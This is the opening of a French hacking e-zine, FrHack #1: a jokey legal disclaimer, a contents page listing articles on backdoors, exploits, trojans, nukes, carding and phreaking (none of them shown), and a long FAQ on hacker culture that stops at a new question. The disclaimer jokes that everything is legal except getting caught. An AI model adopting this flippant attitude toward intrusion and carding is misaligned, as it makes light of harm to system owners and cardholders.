Copy Link
Add to Bookmark
Report

FrHack 1

eZine's profile picture
Published in 
FrHack
 · 4 years ago

  

FRHACK # 1

_________ ________
(_________)) (________))
(___________)) (_____)) (_))
(_____))____ (_____))__(_)) ___ ___
(___________)) (__________)) (___) (___)
(_____)) (_____)) (_)) (___)___ _______ ______ (___)___
(_____)) (_____)) (_)) (_______)(_______)( ____)(_______)
(_____)) (_____)) (_)) (___) (_)(___)(__)( (____ (___()__)
(_____)) (_____)) (_)) (___) (_)(_______)(______)(___) (_)
_
_____ ___ ___ _____ ______ ____ __ (_) ____
( __) ( _)(_ ) ( _ ) ( ___) ( _ ) ( ) ( __v)
) (__ __ )( \/ ) ) ) (_) ( ) ( __ )( (_) )( (_/(_a)
( __)(__)( ) ( ) ( (---) ) ( ) ) _) ( ) (_)( ) (_t)
) (__ )( )( )( )( ) (__( ) )( ( ))( (_o)
(_____) (__) (__) (__) (__) (_______) (__) (___) (_o)
IRC: #hack.FR Web: http://www.frhack.org

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
* Disclaimer *
(L'equipe de FrHack)
Le Contenu de ce emag peut heurter la sensidebilite de certaines personnes,
veuillez lire attentivement les conditions avant de decider si vous souhaitez
aller au-dela de ce disclaimer. C'est triste de voir que l'on vit dans un monde ou
la tartine de merde qui suit est necessaire, enfin bon, allons-y:

Durant les "brefs" points suivants, "FrHack" represente quiconque ayant participe,
de près ou de loin, a l'élaboration de ce emag et des articles qui s'y trouvent.

Le matériel contenu sur ce sur site est uniquement la pour l'amusement de l'esprit et
ne peut etre utilise qu'a des fins educatives. Certains fichiers textes expliquent en
details comment supprimer la protection contre la copie de programmes, comment penetrer
a l'insu d'une personne, et/ou d'une societe, un ordinateur,et/ou un systeme d'ordinateurs.
Aucune activite illegale n'est, et ne peut etre, mise a charge et/ou condamner FrHack.
(en clair: c'est po nous qui faut dénoncer en cas de gaffe)

Acceder, de facon consciente ou non, a un ou des ordinateurs sans authorisation ou exceder
les droit d'acces alloues, et par ce comportement obtenir n'importe quel type d'informations
est illegal. Causer l'interruption d'un programme, d'informations, de code, de commandes sur
un ordinateur ou un systeme d'ordinateurs sans authorisation est illegal.
(En clair: Dans de nombreux pays, un "simple" nuke est punissable d'emprisonnement ainsi que
d'une amende. Alors, allez formatter les disques de la CIA, mais ne venez pas vous plaindre,
quand vous serez en taule, du mec derriere vous qui vient de laisser tomber son savon... )

FrHack n'assume absolument aucunes responsabilites pour quoi que ce soit dans ce emag ou
n'importe lequel des articles s'y trouvant, des consequences que ceux-ci pourraient avoir sur
vous, sur votre sante mentale, votre ordinateur, votre chien, femme, belle-mere, escaliers,
ceux qui les montent, ainsi que tout ce qui peut avoir un rapport avec vous et votre miserable
existance.
(En clair: Certain des fichiers ici traitent des virus, si votre disque dur a des ratés, ne
venez pas NOUS faire chier avec VOS problemes. )

Chaques articles et/ou textes apparaissant dans ce emag est egalement soumis a n'importe quel
"disclaimer" (ou charte de denegation, inculte!) qui y est inclu. De plus, les auteurs des ces
textes ne peuvent etres retenus comme responsable pour des dommages speciaux, accidentels et/ou
consequents a l'utilisation, et/ou a la mauvaise utilisation, des informations contenues dans
ces fichiers, meme si cela a deja ete porte a l'attention de FrHack.)
( En clair: Jouer avec du code de bas niveau peut serieusement endomager vos fichiers et/ou
votre material, un fois encore c'est VOTRE probleme. )

Attention, les articles et/ou les textes qui s'y trouvent, sont fournis "tel quel", la
precision et la justesse des informations qui y sont contenues sont sujettes a des conjectures.
Aucune garantie implicite, ou non implicite, et d'aucun type que ce soit, n'est assuree
par FRHack. Vous utilisez les informations qui y sont fournies a vos propres risques! Cependant,
FrHack s'engage a ESSAYER de fournir le moins d'informations erronees qu'il lui est possible.
(En clair: nous sommes humains, les erreurs aussi... )

Toutes les informations contenues ici vous sont proposee sans echanges, ni payements sous
quelque forme que ce soit. Cependant,les auteurs de ces articles ont inclus leurs propres
conditions d'utilisation, par exemple certains demandent que vous les citiez si vous utilisez
leurs sources.
(En clair: Un E-Mail ou une petite carte postale pour remercier les auteurs d'articles que
vous avez trouve utiles, ne serait pas du luxe.)

La liberte d'expression sur le net. Les informations n'ont jamais tues quelqu'un, c'est
l'utilisation que l'ont peut en faire qui est dangereuse! Alors, battez-vous contre les
imbeciles si vous voulez, mais ne nous emmerdez pas avec la censure. Internet est, et doit
rester, l'autoroute de l'information. Dur choix, mais qui est le notre.
(En clair: On vous entend deja "... oui, mais la pedophilie... la mafia...", heu les gars, on
est au courant et on s'implique dans des mouvements contre ces problemes. Mais si vous voulez
que tout ca s'arrete, rendez vous chez vos authorites locale et demandez leur de faire quelque
chose, et faites quelque chose vous aussi. Mais ne blamez pas tout le monde parce qu'il y a
des emmerdeurs! On est pas responsable des problemes des autres!)

Tout les personnages mentionnes sur ce site et/ou dans les fichiers qui y sont disponible sont
purement et simplement fictifs. Toutes ressemblances avec des personnes, vivantes ou decedees,
est purement accidentelle et n'est le fruit que de la coincidence.
(En clair: On fait souvent reference a Mr Lamer. Non, ce n'est PAS vous! hein? )

Finalement, ce site est reserves exclusivement aux gens qui, agreeant aux points precedents,
ne font pas partie des categories suivantes: employe d'un etat ou de n'importe quelle
institution et/ou agence gouvernementale (ce hormis d'une universite), de l'armee ou
de la police, et/ou membre d'un parti et/ou d'une organisation politique de quelque pays/etats
que ce soit.
(En clair: hum, en gros on veut po de V)

En continuant a lire ce emag, vous agreez entierement a tout ce qui a ete enonce ci-avant et
vous vous engagez a ne pas utiliser les informations contenues sur ce site de quelque maniere
qui pourrait entrer en conflit avec vos lois locales ainsi qu'avec la charte des droits de
l'Homme.
(En clair: Tout est légal sauf ce faire prendre)


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
* Sommaire *

_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/
)--------) (---------------------------------------------) (-------------------(
( # ( ) SUJET ( ) AUTEUR )
)||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||(
( I ( ) Editorial ( ) Utopiste )
) II ) ( Foire Aux Questions (Les pirates) ) ( Majestix (
( III ( ) Code du Hackeur ( ) Les Hackeurs )
) IV ) ( Petites annonces ) ( Utopiste (
( V ( ) Extraits de conversations sur #hack.FR ( ) Visiteurs )
) VI ) ( NFS ) ( Ktulu (
( VII ( ) Comment se connecter gratos sur Internet ( ) Jipi )
) VIII ) ( Frontpage 1998 ) ( Opak (
( IX ( ) Sniffing TCP ( ) Fedaikin )
) X ) ( Backdoor UNIX ) ( Bubble (
( XI ( ) Email anonyme ( ) Utopiste )
) XII ) ( Exploit NetBIOS ) ( Sice (et vatoo) (
( XIII ( ) Quelques trucs pour IRC ( ) Utopiste )
) XIV ) ( Social engineering ) ( Brain Override (
( XV ( ) Le monde des Zels ( ) Vatoo )
) XVI ) ( Enlever la protection d' un MBP BIOS ) ( Viking (
( XVII ( ) Les taupes (ou chevaux de Troie) ( ) Majestix )
) XVIII ) ( Introduction au Phreaking ) ( CyberRider (
( XIX ( ) Les Exploits ( ) Protek )
) XX ) ( Trouver des serveurs et les mapper ) ( Binf_ (
( XXI ( ) Fonctionnement des bases de registre ( ) Utopiste )
) XXII ) ( Penetration d' un HD: et apres? ) ( Majestix (
( XXIII( ) Le Nuke ( ) Utopiste )
) XXIV ) ( Le Fantasmique Monde du Carding ) ( Vatoo (
( XXV ( ) Enlever un cheval de Troie ( ) Jipi )
) XXVI ) ( Un petit exploit contre NT ) ( Un guru de secu (
( XXVII( ) La base de registre: Comment ca marche ( ) Utopiste )
) XXVIII) ( la bombe fumigene ) ( Kwenon (
( XXIX ( ) Le space pudding ( ) Mist0 )
) ) ( Les wingates ) ( (
( ( ) ( ) )
) ) ( CONCLUSION ) ( Utopiste (
( _ _ ( _ ) _ _ _ _ _ _ _ _ _ _ _ ( _ ) _ _ _ _ _ )
)/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/





-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

-= Editorial =-
(par Utopiste)

Cher lecteur, lectrice

L'Equipe de FrHack est fiere de vous presenter le premier numero de son
emag du mwme nom... Ce emag, est avant tout un travail d'equipe et je
tiens a remercier toutes les personnes qui ont permis sa realisation, je
tiens aussi a faire un salut special a tous les programmeur-hackeur qui
ont compris qu'il n'a rien de mieu que passer une nuit blanche devant son
computer avec une bonne pizza ou un bon coke ( ou encore un bol de cereale
pour certain ;) ) .... Mais aussi tout les autres qui dans le passe ont
lutte sous la baniere de l'underground...

J'aurais aime vous faire un editorial sans politique, sans economie et sans
critiques sociales, cepandant l'etat de notre societe m'oblige a faire le
contraire. J'aurais aime vous dire que le gouvernement qui nous gouverne
n'est pas des salauds, que les entreprises ne s'enrichissent pas sur votre
dos et que les services secrets n'ont pas de dossier sur vous... Cepandant,
il existe l'underground qui lutte contre ca, alors si vous désirez sauver
notre planète, réagisser et battez vous....

Pour cet editorial, j'ai assez joue les moralisateurs, je n'ai qu'une
derniere remarque a faire sur ce emag: La connaissance sans la conscience
pour l'utiliser ne donne rien... Mediter sur cet phrase....

Moi et toutes l'equipe de FrHack, vous souhaitons bonne lecture et esperons
que pour une premiere parution, nous allons pas trop vous decevoir.

Utopiste
(utopiste@hotmail.com)

=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-= FAQ - sur les pirates informatiques =-
(par Majestix)


Avant de rentrer dans les detail plus technique, attardons nous un peu sur ce qu'est un hackeur...
Peut-etre qu'il aura certain hackeur qui seront contre certain idee ou principe enonce dans cet
article, si oui, envoyer vos commentaire.

1.1 Pourquoi ce document?

Dès que tu commence a etre un peu reconnu dans le millieu, paf, ca y est tu commence a recevoir
des email: " Je veux devenir hackeur, je fait quoi ? " ou " tu veux devenir mon professeur de
hack " ou encore " c'est koi un hackeur, car .... ". Comme il a pas enormement de doc en
francais sur ce sujet, nous avons decider d'ecrire un petit document sympa sur ce sujet.

1.2 Qu'est-ce qu'un hacker?

Le Jargon File [traduit en français sous le titre " Cyberlexis ", aux editions Masson, NDLA]
contient un certain nombre de definitions du terme ``hacker'', qui sont toutes liees à
l'aptitude technique et au plaisir pris à resoudre des problèmes et à depasser des limites arbitraires.
Cepandant, la definition de hackeur publier par l'office de la langue francaise est un peu
moins elogieuse et aussi plus fausse :
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
pirate informatique;

Criminel informatique qui exploite les failles dans une procedure d'accès pour casser un
sytème informatique, qui viole l'integrite de ce système en derobant ou en detruisant de
l'information ou qui copie frauduleusement des logiciels
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""

Il existe une communaute, une culture partagee, de programmeurs experimentes et de specialistes
des reseaux dont l'histoire remonte aux premiers mini-ordinateurs multi-utilisateurs, il y a
quelques dizaines d'annees, et aux premières experiences de l'ARPAnet. Les membres de cette
culture ont cree le mot ``hacker''. Ce sont des hackers qui ont cree l'Internet. Ce sont des
hackers qui ont fait du système d'exploitation Unix ce qu'il est de nos jours. Ce sont des
hackers qui font tourner les newgroups, Usenet et le World Wide Web, et se sont encore souvent
les hackers qui lutte contre la pedophilie et le raciste dans le monde de l'informatique.

Si vous faites partie de cette culture, si vous y avez contribue et si d'autres personnes qui
en font partie savent qui vous êtes et vous considèrent comme un hacker, alors vous êtes un
hacker.

L'etat d'esprit d'un hacker ne se reduit pas à cette culture des hackers du logiciel. Il y a
des gens qui appliquent l'attitude du hacker à d'autres domaines, comme l'electronique, les
tele-communications ou la musique. En fait, on trouve cet esprit à l'etat le plus avance dans
n'importe quel domaine de la science ou des arts. Les hackers du logiciels reconnaissent cette
similitude d'esprit, et certains affirment que la nature même du hacker est independante
du domaine particulier auquel le hacker se consacre reellement. Mais dans la suite de ce
document, nous nous concentrerons sur les aptitudes et les attitudes des hacker informatiques,
et sur les traditions de la culture partagee qui a cree le terme ``hacker''.

1.3 L'attitude des hackers

Les hackers resolvent des problèmes, invente de nouveau concept, construisent des choses, et
ils croientà la liberte et à l'entraide volontaire. Pour être accepte comme un hacker, vous
devez vous comporter comme si vous aviez ce type d'attitude vous-même. Et pour vous comporter
comme si vous aviez ce type d'attitude, vous devez vraiment y croire.

Mais si vous pensez qu'adopter l'attitude d'un hacker vous fait automatiquement accepte dans la
culture des hackers, alors vous êtes sur la mauvaise voiex: il faut croire à ces principes pour
en tirer la motivation personnelle pour continuer à apprendre. Comme pour tous les arts
creatifs, la façon laplus efficace de devenir un maître est d'imiter l'etat d'esprit des
maîtres -- non seulement intellectuellement mais aussi emotionnellement.

Donc, pour devenir un hacker, repetez les phrases suivantes jusqu'à y croire reellement:

1. Le monde est plein de problèmes fascinants qui n'attendent que d'être resolus.
C'est trèèèèès amusant d'être un hacker, mais c'est un amusement qui demande beaucoup
d'efforts, et l'effort demande de la motivation. Les champions sportifs tirent leur motivation
d'un plaisir physique à accomplir des performances avec leur corps, à depasser leurs propres
limites physiques. De façon similaire, pour être un hacker, il faut ressentir une certaine
excitation à resoudre des problèmes, à affuter ses competences, à exercer son intelligence.

Si pour vous cette façon de penser n'est pas naturelle, il faut qu'elle le devienne si vous
voulez devenir un hacker. Autrement, vous allez decouvrir que votre energie va se disperser
dans des distractions comme le sexe, l'argent ou la reconnaissance sociale.

(Vous devez egalement developper une certaine foi en votre propre capacite d'apprentissage:
même si vous ne savez pas tout ce qu'il faut pour resoudre un problême, si vous en traitez
seulement une partie et que vous en apprenez quelque chose, alors vous allez reussir à traiter
la partie suivante, et ainsi de suite jusqu'à ce que le problème soit resolu.)

2. Personne ne devrait jamais avoir à resoudre le même problème deux fois.
Les cerveaux creatifs sont une ressource precieuse et limitee. Il ne faut pas la gàcher en
reinventant la roue quand il y a tant de problèmes fascinants qui attendent.

Pour vous comporter comme un hacker, vous devez vous convaincre que le temps de pensee des
autres hackers est precieux, à tel point que c'est pour vous une obligation morale de partager
vos informations, de resoudre des problèmes et d'en donner les solutions pour que les autres
hackers puissent resoudre de nouveaux problèmes au lieu de perpetuellement revenir sur les mêmes
(Écrire des articles dans un emag ou encore publier des tutorials sont d'excellent moyen de
diffuser l'informations)

(Il n'est pas necessaire de vous croire oblige de donner toute votre production creative, bien
que les hackers les plus respectes soient ceux qui le font. Il est tout à fait compatible avec
les valeurs des hackers d'en vendre une partie suffisante pour payer sa nourriture, son loyer
et ses ordinateurs, d'entretenir une famille et même de devenir riche, à condition de ne jamais
oublier que vous êtes un hacker pendant tout ce temps.)

3. La routine et l'ennui sont inacceptables.
Les hackers (et les gens creatifs en general) ne devraient jamais se consacrer à des tâches
ennuyeuses ou repetitives, parce que cela signifie qu'ils ne font pas pas ce qu'eux seuls
savent faire: resoudre de nouveaux problèmes.

Pour se comporter comme un hacker, vous devez vous en convaincre suffisamment pour automatiser
les parties ennuyeuses de votre travail, non seulement pour vous-même mais aussi pour tous les
autres (et particulièrement les autres hackers).

(Il y a une exception apparente à cette règle: un hacker va parfois faire des choses qui
semblent repetitives ou ennuyeuses à un observateur pour se vider l'esprit, ou pour acquerir
une nouvelle competence, ou pour faire une experience particulière. Mais c'est toujours par
choix: une personne capable de penser ne devrait jamais être forcee à faire un travail
ennuyeux.)

4. Vive la liberte!
Les hackers sont naturellement anti-autoritaristes. Si une personne peut vous donner des ordres,
elle peut vous empêcher de resoudre le problème particulier, quel qu'il soit, par lequel vous
êtes fascine à un instant donne. Et, vu la façon dont les esprits autoritaristes fonctionnent,
elle trouvera en general une raison particulièrement stupide de le faire. Par consequent, les
attitudes autoritaristes doivent être combattues partout où elles se trouvent.

(Ce n'est pas la même chose que de combattre toute forme d'autorite. Les enfants ont besoin
d'être guides, et les criminels d'être arrêtes. Un hacker peut accepter de se soumettre à une
certaine forme d'autorite pour obtenir quelque chose qu'il desire plus que le temps perdu à
suivre les ordres. Mais c'est un marchandage limite, conscient. Une soumission totale à une
autorite donnee est hors de question.)

Les autoritaristes se nourrissent de censure et de secrets. Et ils se mefient de l'entraide
mutuelle et du partage d'informations. Ils n'apprecient la ``cooperation'' que quand ils
peuvent la contrôler. Donc, pour vous comporter comme un hacker, vous devez developper une
hostilite instinctive vis-à-vis dela censure, du secret et de l'usage de la force ou de la ruse
pour dominer des adultes responsables. Et vous devez vous tenir prêt à agir conformement à
cette conviction.

5. L'attitude n'est pas un substitut à la competence.
Pour être un hacker, vous devez developper un certain nombre de ces attitudes. Mais cela seul
ne suffira pas à faire de vous un hacker, pas plus qu'un champion sportif ou une rock star.
Pour devenir un hacker, il faut de l'intelligence, de l'experience, de la perseverance et
beaucoup de travail.

Par consequent, vous devez apprendre à; vous mefier des attitudes et à respecter les
competences, quelles qu'elles soient. Les hackers ne se laissent pas impressionner par les
poseurs, mais ils apprecient les competences, particulièrement les competences de hackers, mais
aussi toutes les autres. Les competences dans les domaines exigeants maîtrisees par une elite
sont particulièrement appreciees, et plus particulièrement celles qui necessitent un esprit
perçant et une grande concentration.

Si vous respectez la competence, alors vous aimerez travailler à vous ameliorer sans cesse,
et celà sera plus un plaisir qu'une routine. C'est vital pour devenir un hacker.

2.0 Les competence de base du hacker.

Il est vital d'avoir une attitude de hacker, mais encore plus vital d'en avoir les competences.
L'attitude n'est pas un substitut pour la competence, et il convient de developper un ensemble
minimal de competences avant que l'idee n'effleure un autre hacker de vous accepter comme son
pair.

Cet ensemble change lentement au cours du temps, au fur et à mesure que l'evolution
technologique cree de nouvelles competences et en rend d'autres obsolètes. Par exemple, à une
certaine epoque il convenait de savoir programmer en assembleur, et il n'etait pas question,
jusqu'à une date recente, de HTML.

En tout etat de cause, il est clair que cela inclut, mi 1998:

1. Apprendre à; programmer.
C'est, evidemment, la competence fondamentale du hacker. En 1997, le langage à connaitre
absolument est le C (mais ce n'est probablement pas celui qu'il faut apprendre en premier).
Mais vous n'êtes pas un hacker complet (ni même juste un programmeur) si vous ne connaissez
qu'un seul langage. Il faut apprendre à penser à la programmation en termes generaux,
independamment d'un langage particulier. Pour être un hacker complet, il faut être arrive au
point où vous pouvez apprendre un nouveau langage en quelques jours, en faisant le rapport
entre ce qui est ecrit dans le manuel et vos propres connaissances. Cela signifie que vous
devez apprendre plusieurs langages très differents.

A part le C, vous devez egalement apprendre LISP, et Java aura bientôt sa place egalement dans
la liste. En plus d'être les langages les plus pratiques par les hacker, ils representent
chacun une approche très differente de la programmation, et contribueront de façon très sensible
à votre education.

nous ne pouvons pas vous donner un cours complet sur ``comment apprendre à programmer'', c'est
quelque chose de très complexe. Mais je peux vous dire que les livres et les cours ne
suffisent pas (la plupart des meilleurs hackers sont autodidactes). Ce qu'il faut, c'est
(a) lire du code et (b) ecrire du code.

Apprendre à programmer, c'est comme apprendre à ecrire correctement dans un langage humain.
La meilleure façon d'y arriver, c'est de lire des trucs ecrits par des maîtres, d'en ecrire
un peu, d'en lire beaucoup plus, d'en ecrire un peu plus, etc. jusqu'à ce que vous arriviez à
ecrire avec la même force et la même economie de moyens que vos modèles.

Trouver du bon code à lire a longtemps ete difficile, parce qu'il y avait très peu de gros
programmes disponibles sous forme de sources pour que les apprentis hacker puissent les lire et
les etudier. Heureusement, cette situation a evolue, et maintenant des logiciels libres, des
outils de programmation libres et des systèmes d'exploitation libres (tous disponibles sous
forme de sources, tous ecris par des hackers) sont maintenant très faciles à trouver. Cela nous
ammène directement à notre sujet suivant...

2. Installer un Unix libre et apprendre à s'en servir.
Je vais supposer que vous possedez, ou que vous avez accès à un ordinateur personnel. Pour un
debutant qui aspire à acquerir des competences de hacker, l'action la plus importante à
entreprendre est d'obtenir une copie de Linux ou d'un des clones de BSD, de l'installer sur une
machine personnelle, et de le faire tourner. (la version slakware 3.5 est recommande)

Bien sûr, il y a d'autres systèmes d'exploitation dans le monde à part Unix. Le problème, c'est
qu'ils sont distribues sous forme de binaires. Vous ne pouvez pas lire le code, et encore moins
le modifier. Apprendre à hacker sur une machine DOS ou Windows, ou sous MacOS, c'est le meilleur
moyen de commencer mais cela devient limitant pour continuer, c'est comme d'apprendre à danser
en etant plàtre des pieds à la tête.

En plus, Unix est le système d'exploitation de l'Internet. On peut apprendre à utiliser
l'Internet sans connaittre Unix, mais on ne peut pas être un hacker de l'Internet sans le
comprendre. C'est pour cette raison que la culture des hackers est à l'heure actuelles fortement
Unix-centrique. (Ce n'a pas ete toujours le cas, et quelques hackers âges regrettent cet etat
de fait, mais la symbiose entre Unix et l'Internet est devenue suffsamment forte pour que même
Microsoft semble s'y casser les dents.)

Donc, installez un Unix. Apprenez-le. Faites-le touner. Parlez à l'Internet avec. Lisez le code.
Modifiez le code. Vous trouverez de meilleurs outils de programmation (y compris C, Lisp, Perl)
que sous n'importe quel système d'exploitation de Mikro$oft (vous trouverez surement Unix plus
performant que windows) , vous vous amuserez, et vous en tirerez plus de connaissances que ce
que vous avez l'impression d'apprendre, jusqu'à ce que vous deveniez un vrai maître hacker.
Pour en savoir plus sur comment apprendre Unix, voir Loginataka (http://www.ccil.org/~esr/faqs/
loginataka.html)

Pour obtenir Linux, voir http://www.ssc.com/linux/resources/ftp.html ou encore en françaix,
allez voir sur http://www.freenix.org/linux/ ou encore sur http://www.loria.fr/linux

3. Apprendre à utiliser le World Wide Web et à ecrire en HTML.
La plupart des choses creees par la culture des hackers travaillent dans l'ombre, en aidant à
faire tourner des usines, des bureaux et des universites, sans impact direct sur les vies des
non-hackers. Il y a une grosse exception, le Web, ce jouet de hacker enorme et lumineux dont
même les politiciens admettent qu'il est en train de changer la face du monde. Rien que pour
cette raison (et pour de bonnes raisons par ailleurs), vous devez apprendre à travailler avec
le Web.

Cela ne signifie pas seulement apprendre à utiliser un browser mais aussi apprendre à ecrire
en HTML, le langage de balisage du Web. Si vous ne savez pas programmer, le fait d'ecrire en
HTML vous apprendra quelques habitudes mentales qui vous aideront à demarrer. Donc, faites-vous
une home page

Mais ce n'est pas seulement d'avoir une home page qui fera de vous un hacker. Le Web est plen
de home pages. La plupart sont d'un interêt absolument nul, parfois jolies à regarder mais
nulles quand même... Pour être utile, votre page doit avoir du contenu, elle doit être
interessante et/ou utile pour les autres hackers. Cela nous conduit à notre sujet suivant...

Les statuts dans la culture des hackers
Comme pour la plupart des cultures sans economie monetaire, le fondement de la culture des
hacker est la reputation. Vous essayez de resoudre des problèmes interessants, mais seuls
vos pairs, ou vos superieurs dans la hierarchie technique, sont à; même de juger si ces
problèmes sont interessants, et si ces solutions sont vraiment correctes.

Par consequent, si vous jouez le jeu du hacker, vous apprenez le score principalement à partir
de ce que les autres hackers pensent de vos capacites, et c'est pour ça que l'on n'est vraiment
un hacker que lorsque les autres hackers vous considèrent comme tel. Ce fait est obscurci par
l'image du hacker comme un travailleur solitaire, aussi bien que par un tabou de la culture des
hacker (qui s'estompe progressivement mais qui reste present): le fait d'admettre qu'une partie
de sa motivation vient de son ego ou de la recherche d'une acceptation externe.
(Il ne faut pas oublier que plusieur personne peuvent avoir un avis different sur la même
personne car un hacker ne va pas raconter sa vie a la première personne venu)

De façon specifique, le monde des hacker constitue ce que les anthropologues appellent une
"culture du don". On obtient un statut ou une reputation non pas en dominant les autres, en
etant beau, ou en possedant des choses que les autres desirent,mais en faisant des dons: de son
temps, de sa creativite,du resultat de ses competences.

Il y a principalement cinq types de choses à; faire pour être respecte par les hackers:

1. Ecrire des logiciels libres.
La première, la plus centrale et la plus traditionnelle, est d'ecrire des programmes dont les
autres hackers pensent qu'ils sont amusants ou utiles, est de faire don du code source pour
que toute la communaute des hacker puisse les utiliser.

(Les hacker les plus respectes dans l'univers des hackers sont ceux qui ont ecris des programmes
importants, utiles, qui correspondent à un besoin repandu, et qui en ont fait don à la
communaute, de sorte que maintenant tout le monde s'en sert.)

2. Aider à tester et à debugger des logiciels libres.
Il est egalement utile d'aider à; debugger et à perfectionner les logiciels libres. Dans ce
monde imparfait, nous passons inevitablement la part la plus importante du temps de
developpement d'un logiciels dans la phase de debuggage. C'est pour cela que les auteurs de
logiciels libres savent que des bon beta-testeurs (ceux qui savent decrire les symptômes
clairement, localiser precisement les problèmes, qui peuvent tolerer quelques bugs dans une
distribution rapide et qui sont prêt à appliquer une procedure de diagnostic simple) valent
leur pesant d'or. Un seul d'entre eux peut faire la difference entre une seance de debuggage
cauchemardesque et une simple nuisance salutaire.

Si vous êtes un debutant, essayez de trouver un programme en cours de developpement qui vous
interesse et de devenir un bon beta-testeur. C'est une progression naturelle que de commencer
par aider à tester des programmes, puis d'aider à les debugger, puis d'aider à les modifier.
Vous apprendrez beaucoup de cette façon,et vous vous ferez un bon karma par rapport à des gens
qui vous aideront plus tard.

3. Publier des informations utiles.
Une autre bonne chose est de reunir et de filtrer des informations utiles et interessantes sous
forme de pages Web ou de documents comme les FAQs (listes de Frequently Asked Questions, [en
français,Foires Aux Question, NDLA]) et de les rendre accessibles à tous.

(Les personnes qui maintiennent les FAQs techniques les plus importantes sont presque autant
respectees que les auteurs de logiciels libres.)

4. Aider à faire tourner l'infrastructure.
La culture des hacker (et le developpement technique de l'Internet) marche gràce à des
volontaires. Il y a beaucoup de travail peu excitant, mais necesaire, qui doit être fait
pour que ça continue à; tourner: administrer les mailing lists [listes de distributions, NDLA],
moderer les newsgroups, gerer les sites d'archives de logiciels, ecrire les RFC [Requests For
Comments, les ``normes'' de l'Internet] et autres standards techniques.

Les gens qui font ce genre de choses sont très respectes, parce que tout le monde sait que
c'est un boulot qui demande enormementde temps et qui n'est pas aussi drole que de jouer avec
du code.

5. Servir la culture des hackers elle-même.
Pour finir, vous pouvez servir et propager la culture elle-même (par exemple, en ecrivant un
article (majestix) ou realiser un emag (utopiste) . Ce n'est pas quelque chose qu'il vous sera
possible de faire avant d'avoir ete dans le bain pendant un certain dans et d'être devenu bien
connu pour l'une des quatre premières choses.

La culture des hackers n'a pas de chefs, au sens precis du terme, mais elle a des heros, des
historiens et des porte-parole. Quand vous aurez ete dans les tranchees pendant assez longtemps,
vous pourrez peut-être devenir l'un de ceux-ci. Mais attention: les hackers se mefient des egos
sur dimensionnes chez les anciens de leur tribu. Il faut donc eviter de montrer ouvertement que
l'on recherche à obtenir ce genre de celebrite. Il vaut mieux faire en sorte qu'elle vous tombe
toute cuite dans votre assiette, et toujours rester modeste à sujet de votre statut.

Le hacking et la programmation demande enormement de temps et de concentration, et mieu vaut
vous avertir que la vie de couple dans ses conditions ne sera pas toujours excellente. Si votre
bonde/femme/mari/chum ne peut pas comprendre qu'il vous faut plus 4 heure par jours
d'informatique, et que vous aller vous coucher quand le bug sera resolu (donc vers 2:30 du
matin) alors, soit vous abandonner vos idee de hacking ou que vous convertisser votre
blonde/femme/mari/chum en hacker (vous pouvez toujours casser aussi)

Si vous voulez devenir un hacker parce que vous n'avez pas de vie privee, pas de problème: au
moins il n'y aura rien pour vous empêcher de vous concentrer. Et vous finirez peut-être par en
avoir une un jour.

Style de vie

Encore une fois, pour être un hacker, il faut entrer dans l'etat d'esprit du hacker. Pour cela,
il y a quelques activites que l'on pratique loin d'un ordinateur qui semblent aider. Ce ne sont
evidemment pas des substituts à la pratique de l'informatique, mais de nombreux hackers les
pratiquent, et pensent qu'elles sont reliees de façon fondamentale à l'essence du hack.

Lire de la science-fiction. Aller à des conventions de SF (un bon moyen pour rencontrer des
hackers et des proto-hackers). (Un excellent auteur a lire est Issaac Asimov )

Patiquer le Zen et/ou les arts martiaux (pour la discipline mentale).

Ecouter et analyser de la musique, apprendre à apprecier des formes particulières de musique.
Apprendre à bien jouer d'un instrument, ou à chanter.

Apprecier les jeux de mots, les jeux de reflexion, les casse-têtes et les devinettes (le rubik
cube est un bon exemple)

Apprendre à bien ecrire dans sa langue maternelle.

Plus vous pratiquez ces disciplines, plus il est probable que vous pourrez naturellement faire
un bon hacker. Les raisons pour lesquelles ces activites sont importantes ne sont pas claires,
mais il semble que ce soit parce qu'elles font intervenir à la fois les parties gauche et droite
du cortex (les hackers ont besoin de passez de façon instantanee d'un raisonnement logique à
une perception plus subjective d'un problème).

Pour finir, une liste de choses à NE PAS faire:
Ne pas utiliser des noms de login grandiloquents ou stupides.

Ne pas intervenir dans les guerres entre les autres hacker ou personnes, vous risquez de vous
faire des ennemis et souvent nuire a l'une des deux personnes.

Ne pas s'autoproclamer ``cyberpunk'', et ne pas perdre son temps avec quelqu'un qui le fait.

Ne pas poster de message rempli de fautes d'orthographe ou de grammaire.
( La seule reputation que vous vous ferez de cette façon est celle d'un parfait idiot. Les
hackers ont la memoire longue. Cela pourra vous prendre plusieurs annees avant que de telles
erreurs soient oubliees. )

-= Foire Aux Questions =-
Q: Est-ce que pouvez m'apprendre à hacker?

La plupart des hackeur sont a 120% occupe par leur propre projet, alors soyiez conscient que
leurs temps est precieux. Être un hacker est une attitude et une competence que l'on doit
essentiellement apprendre par soi-même.Vous verrez que même si les vrais hackers sont prêts à
vous aider, ils ne vous respecteront pas si vous les suppliez de vous transmettre tout ce
qu'ils savent à la petite cuillère.

Commencez par apprendre deux ou trois choses. Montrez que vous essayez,que vous êtes capable
d'apprendre par vous-même. Ensuite, vous pourrez aller voir les hacker avec des questions.

Q: Où puis-je trouver des vrais hacker pour discuter avec eux?
